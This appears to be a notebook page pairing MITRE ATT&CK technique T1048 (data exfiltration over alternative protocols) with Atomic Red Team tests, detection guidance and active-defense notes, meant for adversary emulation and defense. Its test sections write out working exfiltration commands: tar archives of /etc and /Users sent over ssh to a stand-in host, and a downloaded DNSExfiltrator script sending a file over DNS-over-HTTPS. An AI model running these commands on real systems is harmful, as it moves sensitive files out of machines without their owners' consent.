# T1048 - Exfiltration Over Alternative Protocol
Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.  

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. 

[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).

## Atomic Tests

### Atomic Test #1 - Exfiltration Over Alternative Protocol - SSHInput a domain and test Exfiltration over SSH

Remote to Local

Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.
**Supported Platforms:** macos, linux#### Attack Commands: Run with `sh`
```sh
ssh target.example.com "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```

In [ ]:
Invoke-AtomicTest T1048 -TestNumbers 1

### Atomic Test #2 - Exfiltration Over Alternative Protocol - SSHInput a domain and test Exfiltration over SSH

Local to Remote

Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.
**Supported Platforms:** macos, linux#### Attack Commands: Run with `sh`
```sh
tar czpf - /Users/* | openssl des3 -salt -pass atomic | ssh atomic@target.example.com 'cat > /Users.tar.gz.enc'
```

In [ ]:
Invoke-AtomicTest T1048 -TestNumbers 2

### Atomic Test #3 - DNSExfiltration (doh)
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.
!!! Test will fail without a domain under your control with A record and NS record !!! 
See this github page for more details - https://github.com/Arno0x/DNSExfiltrator

**Supported Platforms:** windows
#### Dependencies:  Run with `powershell`!
##### Description: DNSExfiltrator powershell file must exist on disk at specified location (#{ps_module})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IWR "https://raw.githubusercontent.com/Arno0x/DNSExfiltrator/8faa972408b0384416fffd5b4d42a7aa00526ca8/Invoke-DNSExfiltrator.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1"

```

In [ ]:
Invoke-AtomicTest T1048 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1"
Invoke-DNSExfiltrator -i "PathToAtomicsFolder\..\ExternalPayloads\dnsexfil.ps1" -d target.example.com -p atomic -doh google -t 500 None
```

In [ ]:
Invoke-AtomicTest T1048 -TestNumbers 3

## Detection
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)


## Shield Active Defense
### Network Manipulation 
 Make changes to network properties and functions to achieve a desired effect. 

 Network Manipulation allows a defender to throttle network speeds, segment the network, maintain a unique IP addressing scheme, or add a kill switch to cut off network access if needed.
#### Opportunity
There is an opportunity to disrupt or enable and adversary's exfiltration activities by blocking/unblocking the traffic to their Command and Control (C2) location.
#### Use Case
A defender can prevent or enable use of alternate protocols for exfiltration by blocking/unblocking unnecessary ports and protocols.
#### Procedures
Add a kill switch to a decoy network that can be used to shutdown all network communication if an adversary takes an action that is out of the desired scope.
Introduce intermittent network packet loss on a decoy network to interfere with an adversary's activities.
